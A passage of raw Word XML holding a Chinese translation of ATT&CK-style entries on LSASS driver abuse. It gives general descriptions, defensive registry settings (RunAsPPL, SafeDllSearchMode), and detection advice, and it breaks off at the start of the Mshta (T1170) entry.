        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>sass.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>进程上下文中执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51547F7A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>攻击者可能会把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>sass.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>驱动程序作为目标，用来获取执行或者持久化权限。通过替换或者添加非法驱动程序（如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>测载或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>搜索排序劫持），攻击者可通过持续的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>操作来触发任意代码执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB50ED" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2122"/>
        <w:gridCol w:w="7614"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00A21B67" w14:paraId="0F25CD3D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="144C5344" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4F230FE6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00A21B67" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A21B67">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00800DCC" w14:paraId="43C4F180" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="383F591B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>代码签名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="714A2045" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00800DCC" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:t>indows 8.1</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:t>erver 2012 R2</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>版本，通过设置将注册表项</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:t>设置</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>dword:00000001</w:t>
            </w:r>
            <w:r w:rsidRPr="00D45753">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>来</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>SA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>保护。</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LSA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>保护确保</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>LSA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>插件以及驱动程序</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>只会被经过微软数字签名的软件装载，同时坚持微软安全开发生命周期流程指南。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00800DCC" w14:paraId="72ABAC43" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75718DD8" w14:textId="773A98F4" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="006508E9" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>凭据访问</w:t>
            </w:r>
            <w:r w:rsidR="000F2665" w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>保护</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="205B8936" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>indows 10</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>erver 2016</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>上，启用</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御凭据守护，从而让</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>sass.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>运行在没有任何设备驱动程序的隔离虚拟环境中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00800DCC" w14:paraId="57FD580D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3EFC89C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>限制库装载</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="793DEEC1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="007C37D3" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>设置</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>确保启用安全</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DLL</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>搜索模式，从而减少</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
              </w:rPr>
              <w:t>sass.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="007C37D3">
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>装载恶意代码库的风险</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="ts-alignment-element"/>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D27C0F7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D45753" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:leftChars="0" w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6922A031" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7068572F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在启用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护的情况下，监控事件日志（事件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>033</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3063</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）用来发现尝试失败加载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>插件和驱动程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE588AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用系统内置的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>utoruns/Autorunsc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>工具，检查已经加载的与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LSA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关联的驱动程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B9568D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D21595" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用系统内置的进程监控工具，来监控</w:t>
      </w:r>
      <w:r>
        <w:t>lsass.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>装载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763A22E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Mshta</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="4D89C42D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F5912C4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1170</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0731BAF4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>逃逸，执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19DDDCA3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F662351" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C65CCEB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>命令行</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28731BD4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>是否支持远程：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62FF604A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>白名单，数字证书验证</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A1DF3A3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ricardo Dias</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Ye Yint Min Thu Htut</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Offensive Security Team</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>DBS Bank</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A189E9C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3937D5B4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E0E2EB0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
